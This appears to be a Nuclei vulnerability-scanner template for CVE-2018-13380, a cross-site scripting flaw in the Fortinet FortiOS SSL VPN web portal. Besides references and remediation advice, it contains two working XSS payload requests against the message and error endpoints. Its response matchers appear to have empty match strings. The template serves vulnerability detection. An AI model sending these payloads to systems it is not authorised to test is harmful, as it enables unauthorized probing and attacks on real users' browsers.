id: CVE-2018-13380 info: name: Fortinet FortiOS - Cross-Site Scripting author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. remediation: | Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html - https://fortiguard.com/advisory/FG-IR-18-383 - https://fortiguard.com/advisory/FG-IR-20-230 - https://nvd.nist.gov/vuln/detail/CVE-2018-13380 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 epss-percentile: 0.46301 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet product: fortios tags: cve,cve2018,fortios,xss,fortinet http: - method: GET path: - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B" - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - "" - "" condition: or - type: word part: header negative: true words: - "application/json" - type: status status: - 200 # digest: 490a00463044022079a2e291c05e8a13716356a8ee76352d87c9d4b0c8882e12f7a3d9b6d9e6cfbc0220353087d43b3509b7bd8b7252de4913c3176acfc44d15970ea07f4fbf78bbbc3d:922c64590222798bb761d5b6d8e72950